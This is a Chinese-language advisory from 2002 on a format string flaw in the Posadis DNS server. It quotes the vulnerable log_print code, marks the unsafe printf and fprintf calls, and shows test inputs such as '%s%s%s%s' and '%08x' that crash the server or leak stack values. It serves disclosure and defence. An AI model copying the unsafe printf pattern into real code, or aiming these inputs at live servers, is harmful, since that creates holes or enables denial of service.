Posadis DNS服务器存在格式字符串漏洞发布时间:2002-03-29 更新时间:2002-03-29 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Posadis DNS Server -m5pre1详细描述 Posadis dns服务器是小型的不带缓冲的DNS服务器,可运行在多种系统平台下。 其中log_print处理不正确,可导致格式字符串攻击,问题存在于log.cpp代码中: --- void log_print(message_log_level log_level, char *logmsg, ...) { char buff[4096]; long tsecs; struct tm *tstruct; va_list args; /* compile buffer */ tsecs = time(NULL); tstruct = localtime(&tsecs); sprintf(buff, "%04d/%02d/%02d %02d:%02d|", tstruct->tm_year + 1900, tstruct->tm_mon + 1, tstruct->tm_mday, tstruct->tm_hour, tstruct->tm_min); switch (log_level) { case LOG_LEVEL_INFO: strcat(buff, "INFO: "); break; case LOG_LEVEL_WARNING: strcat(buff, "WARNING: "); break; case LOG_LEVEL_ERROR: strcat(buff, "ERROR: "); break; case LOG_LEVEL_PANIC: strcat(buff, "PANIC: "); break; } va_start(args, logmsg); vsprintf(&buff[strlen(buff)], logmsg, args); va_end(args); strcat(buff, "\n"); /* and print it to various targets */ if (!no_stdout_log) printf(buff); <-- heh if (logfile) fprintf(logfile, buff); <-- heh #ifdef _WIN32 w32dlg_add_log_item(buff); #endif #ifdef HAVE_SYSLOG_H syslog(log_level, "%s", strchr(buff, '|') + 1); #endif } --- 其中带箭头的代码存在格式字符串攻击。 测试代码 [kkr@eightball src]$ ./posadis %s%s%s%s Segmentation fault (core dumped) [kkr@eightball src]$ ./posadis %08x 2002/03/27 01:53|PANIC: Unrecognized option: 4016814c --begin posadis.conf %08x --end posadis.conf [kkr@eightball src]$ ./posadis 2002/03/27 01:59|ERROR: posadis.conf:1: Unknown command 4016814c! 2002/03/27 01:59|PANIC: Loading posadis.conf failed! 解决方案 尚无 相关信息 nick (kkr@dekode.org) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-03/0340.html 相关主页:(http://sourceforge.net/projects/posadis/) |
